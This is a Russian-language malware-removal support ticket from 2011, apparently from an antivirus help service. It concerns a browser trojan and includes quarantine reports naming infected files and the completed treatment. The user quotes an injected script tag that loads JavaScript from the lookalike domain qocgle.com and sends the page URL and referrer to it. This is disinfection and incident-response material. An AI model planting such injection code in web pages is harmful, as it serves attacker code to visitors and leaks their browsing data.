-
Браузерный вирус троян (заявка №94134)
Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
<script src='http" + (("https:" == document.location.protocol) ? "s" : "") + "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("Wp4d0bs3Kq KEahPLm/cwrmOzeYcbX7DgGVcRN1zGDaq0wci714ACDij4e70bm483")+" &r="+escape(document.referrer)+"&u="+escape(doc ume nt.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body></html>
вот такой код вставляеться перед боди
Дата обращения: 02.07.2011 15:23:33
Номер заявки: 94134
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Отчет о карантине
02.07.2011 16:10:05 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\Windows\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 436792 байт
- дата файла: 28.06.2011 14:50:52
- версия: "1.74.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
- C:\\Windows\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 436792 байт
- версия: "1.74.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
-
-
Отчет о карантине
02.07.2011 18:20:05 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\\Windows\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 436792 байт
- дата файла: 28.06.2011 14:50:52
- версия: "1.74.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
- C:\\Windows\\system32\\plduusa.dll - Trojan.Win32.Agent.nppl
- размер: 57344 байт
- дата файла: 01.07.2011 21:54:52
- детект других антивирусов: Avast4: Зловред Win32:Dropper-HDL [Drp]
- C:\\Windows\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
- размер: 436792 байт
- версия: "1.74.0.0 built by: WinDDK"
- копирайты: "Copyright (C) 2004"
-
-
Итог лечения
03.07.2011 15:03:44 лечение успешно завершено
-